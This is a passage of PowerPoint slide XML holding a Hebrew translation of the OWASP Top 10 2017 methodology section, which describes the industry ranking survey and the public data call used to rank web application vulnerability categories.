                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ברשימת התפוצה של עשרת הפגיעויות. הכנסנו אותן לסקר דירוג ושאלנו את המשיבים לדרג את ארבעת הפגיעויות העיקריות אשר לדעתם היו צריכות להיכלל במהדורת 2017 של מסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. הסקר היה פתוח מ-2 לאוגוסט ועד 18 לספטמבר 2017. 516 תגובות נאספו והפגיעויות דורגו.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans"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he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans"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50" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans"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50" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans"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50" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans"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50" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans"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50" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans"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50" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans"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50" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans"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50" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans"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50" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans"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50" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>חשיפת מידע פרטי הינה ללא ספק הפגיעות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ברמת הדירוג הגבוהה ביותר, אך היא מתאימה בקלות כדגש נוסף כחלק מ-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A3:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t> חשיפת מידע רגיש</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. כשלי הצפנה עשויים להתאים לתוך חשיפת מידע רגיש. הפיכת רצף תווים לאובייקט המקורי בצורה בלתי מאובטחת דורג כמספר שלוש, לכן הוא התווסף לרשימת עשרת הפגיעויות כ-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>פתיחה לא מאובטחת של רצף סדרתי</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> לאחר דירוג הסיכון. הרביעי בדירוג שימוש במפתח בשליטת המשתמש נכנס לתוך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A5:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t> בקרת גישה שבורה</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> טוב לראות כי דורג גבוה בסקר, מכיוון שאין מידע מספיק הקשור לפגיעויות הנוגעות להענקת הרשאות. מספר חמש בקטגוריות המדורגות בסקר הוא תיעוד וניטור בלתי מספקים, אשר אנו מאמינים שהוא מתאים לרשימת עשרת הפגיעויות, לכן הוא נהפך ל-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A10:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t> תיעוד וניטור בלתי מספקים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. הגענו למצב בו יישומים נדרשים להיות מסוגלים להגדיר מה עשוי להיות מותקף ולייצר תיעוד מספק, התראות, הסלמה ותגובה.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="334404">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he-IL" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>קריאות למידע מהציבור</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="144163525"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3291073">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>באופן</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מסורתי, המידע שנאסף ונותח היה לרוב בין השורות של מידע שכיח: כמה פגיעויות התגלו בבדיקות היישומים. בני אדם לרוב מדווחים לגבי ממצא בודד עם מספר דוגמאות. הדבר מקשה לאחד את שני סגנונות הדיווח באופן הניתן להשוואה.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>עבור</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מהדורת 2017, דירוג האירועים חושב ע"י כמה יישומים באוסף נתונים נתון נפגע ע"י פגיעות מסוג אחד או יותר. המידע ממספר רב של תורמים גדולים סופק בשני אופנים. הראשון היה בדרך המסורתית של ספירת התדירות לכל מופע של פגיעות שהתגלתה, כאשר השני היה ספירת מספר היישומים בהם התגלתה כל פגיעות (אחת או יותר). אומנם לא מושלם, הדבר אפשר לנו בצורה סבירה להשוות את המידע שנאסף ע"י כלים לסיוע לבני אדם ומכלים בשני אדם סייעו להם לכלים תוצרים. המידע הגולמי ועבודת הניתוח זמינים ב-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>GitHub</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. אנו מתכוונים להרחיב על כך עם מבנה נוסף במהדורות עתידיות של </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>קיבלנו</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מעל 40 תשובות לבקשה לקריאה למידע, ומכיוון שמרביתן היו מבקשת הקריאה למידע (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Call for paper</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) המקורית, יכולנו להשתמש במידע מ-23 תורמים המכסה בסביבות 114,000 יישומים. השתמשנו בחלון זמן של שנה ל מנת למנוע זיהוי אפשרי ע"י התורם. מרבית היישומים הינם ייחודיים, למרות העובדה שאנו מודים שהסבירות של חלק מהיישומים לחזור על עצמם במידע השנתי שהגיע מחברת </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Veracode</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. חריגות (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>anomalies</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) במידע שנבחר ממעל 100% מהאירועים הותאמו כלפי מטה למקסימום 100%. על-מנת לחשב דירוג אירוע, חישבנו את האחוז מתוך סך היישומים אשר התגלו כמכילים כל סוג של פגיעות. הדירוג של האירועים שימש לטובת חישוב השכיחות בסיכון הכללי לטובת דירוג עשרת הפגיעויות.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="3889179698"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
